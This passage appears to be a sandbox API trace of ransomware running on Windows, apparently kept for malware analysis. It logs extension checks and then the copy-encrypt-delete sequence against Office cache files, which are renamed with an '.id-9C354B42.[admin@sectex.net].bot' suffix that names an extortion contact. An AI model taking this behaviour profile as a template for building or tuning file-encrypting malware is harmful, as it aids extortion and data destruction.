	[0033.432] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.432] lstrlenW (lpString=".doc") returned 4
	[0033.432] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.432] lstrlenW (lpString=".docx") returned 5
	[0033.432] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.432] lstrlenW (lpString=".pdf") returned 4
	[0033.432] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.432] lstrlenW (lpString=".xls") returned 4
	[0033.432] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.432] lstrlenW (lpString=".xlsx") returned 5
	[0033.432] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.432] lstrlenW (lpString=".ppt") returned 4
	[0033.432] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.432] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.432] lstrlenW (lpString=".zip") returned 4
	[0033.432] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.432] lstrlenW (lpString=".rar") returned 4
	[0033.432] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.432] lstrlenW (lpString=".bz2") returned 4
	[0033.433] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString=".7z") returned 3
	[0033.433] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString=".dbf") returned 4
	[0033.433] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString=".1cd") returned 4
	[0033.433] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString=".jpg") returned 4
	[0033.433] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString=".doc") returned 4
	[0033.433] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString=".docx") returned 5
	[0033.433] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.433] lstrlenW (lpString=".pdf") returned 4
	[0033.433] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString=".xls") returned 4
	[0033.433] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString=".xlsx") returned 5
	[0033.433] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.433] lstrlenW (lpString=".ppt") returned 4
	[0033.433] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.433] lstrlenW (lpString=".zip") returned 4
	[0033.433] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.433] lstrlenW (lpString=".rar") returned 4
	[0033.433] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.433] lstrlenW (lpString=".bz2") returned 4
	[0033.433] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.434] lstrlenW (lpString=".7z") returned 3
	[0033.434] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.434] lstrlenW (lpString=".dbf") returned 4
	[0033.434] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.434] lstrlenW (lpString=".1cd") returned 4
	[0033.434] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.434] lstrlenW (lpString=".jpg") returned 4
	[0033.434] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.434] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.434] lstrlenW (lpString="PublisherMUI.xml") returned 16
	[0033.434] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.435] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1450) returned 1
	[0033.435] CloseHandle (hObject=0x18c) returned 1
	[0033.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020
	[0033.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.438] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.438] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.438] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.438] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.438] GetLastError () returned 0x0
	[0033.438] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5aa, lpOverlapped=0x0) returned 1
	[0033.440] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5b0, lpOverlapped=0x0) returned 1
	[0033.441] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.441] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0033.441] SetEndOfFile (hFile=0x180) returned 1
	[0033.441] CloseHandle (hObject=0x180) returned 1
	[0033.442] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.442] SetEndOfFile (hFile=0x18c) returned 1
	[0033.442] CloseHandle (hObject=0x18c) returned 1
	[0033.443] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.443] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1
	[0033.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.443] lstrlenW (lpString=".doc") returned 4
	[0033.443] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.443] lstrlenW (lpString=".docx") returned 5
	[0033.443] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.443] lstrlenW (lpString=".pdf") returned 4
	[0033.443] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.443] lstrlenW (lpString=".xls") returned 4
	[0033.443] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.443] lstrlenW (lpString=".xlsx") returned 5
	[0033.443] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.443] lstrlenW (lpString=".ppt") returned 4
	[0033.443] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.443] lstrlenW (lpString=".zip") returned 4
	[0033.443] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.443] lstrlenW (lpString=".rar") returned 4
	[0033.443] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.443] lstrlenW (lpString=".bz2") returned 4
	[0033.444] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".7z") returned 3
	[0033.444] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString=".dbf") returned 4
	[0033.444] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString=".1cd") returned 4
	[0033.444] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString=".jpg") returned 4
	[0033.444] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString=".doc") returned 4
	[0033.444] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".docx") returned 5
	[0033.444] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.444] lstrlenW (lpString=".pdf") returned 4
	[0033.444] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".xls") returned 4
	[0033.444] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".xlsx") returned 5
	[0033.444] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.444] lstrlenW (lpString=".ppt") returned 4
	[0033.444] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.444] lstrlenW (lpString=".zip") returned 4
	[0033.444] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.444] lstrlenW (lpString=".rar") returned 4
	[0033.444] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".bz2") returned 4
	[0033.444] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.444] lstrlenW (lpString=".7z") returned 3
	[0033.445] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.445] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.445] lstrlenW (lpString=".dbf") returned 4
	[0033.445] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.445] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.445] lstrlenW (lpString=".1cd") returned 4
	[0033.445] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.445] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79
	[0033.445] lstrlenW (lpString=".jpg") returned 4
	[0033.445] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.445] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.445] lstrlenW (lpString="Setup.xml") returned 9
	[0033.445] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.445] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1608) returned 1
	[0033.445] CloseHandle (hObject=0x18c) returned 1
	[0033.445] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.445] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.446] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.446] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.446] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.446] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.446] GetLastError () returned 0x0
	[0033.446] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x648, lpOverlapped=0x0) returned 1
	[0033.642] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x650, lpOverlapped=0x0) returned 1
	[0033.643] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.643] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.643] SetEndOfFile (hFile=0x180) returned 1
	[0033.643] CloseHandle (hObject=0x180) returned 1
	[0033.644] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.644] SetEndOfFile (hFile=0x18c) returned 1
	[0033.645] CloseHandle (hObject=0x18c) returned 1
	[0033.645] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.645] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.645] lstrlenW (lpString=".doc") returned 4
	[0033.645] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.645] lstrlenW (lpString=".docx") returned 5
	[0033.645] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.645] lstrlenW (lpString=".pdf") returned 4
	[0033.645] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.645] lstrlenW (lpString=".xls") returned 4
	[0033.645] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.645] lstrlenW (lpString=".xlsx") returned 5
	[0033.645] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.646] lstrlenW (lpString=".ppt") returned 4
	[0033.646] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString=".zip") returned 4
	[0033.646] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.646] lstrlenW (lpString=".rar") returned 4
	[0033.646] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString=".bz2") returned 4
	[0033.646] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString=".7z") returned 3
	[0033.646] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString=".dbf") returned 4
	[0033.646] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString=".1cd") returned 4
	[0033.646] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString=".jpg") returned 4
	[0033.646] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.646] lstrlenW (lpString=".doc") returned 4
	[0033.646] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString=".docx") returned 5
	[0033.646] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.646] lstrlenW (lpString=".pdf") returned 4
	[0033.646] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString=".xls") returned 4
	[0033.646] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.646] lstrlenW (lpString=".xlsx") returned 5
	[0033.646] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.646] lstrlenW (lpString=".ppt") returned 4
	[0033.646] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.647] lstrlenW (lpString=".zip") returned 4
	[0033.647] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.647] lstrlenW (lpString=".rar") returned 4
	[0033.647] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.647] lstrlenW (lpString=".bz2") returned 4
	[0033.647] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.647] lstrlenW (lpString=".7z") returned 3
	[0033.647] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.647] lstrlenW (lpString=".dbf") returned 4
	[0033.647] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.647] lstrlenW (lpString=".1cd") returned 4
	[0033.647] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.647] lstrlenW (lpString=".jpg") returned 4
	[0033.647] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.647] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.647] lstrlenW (lpString="Proof.xml") returned 9
	[0033.647] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.647] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1458) returned 1
	[0033.647] CloseHandle (hObject=0x18c) returned 1
	[0033.648] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020
	[0033.648] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.648] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.648] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.648] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.648] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.649] GetLastError () returned 0x0
	[0033.649] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x5b2, lpOverlapped=0x0) returned 1
	[0033.650] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0033.651] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
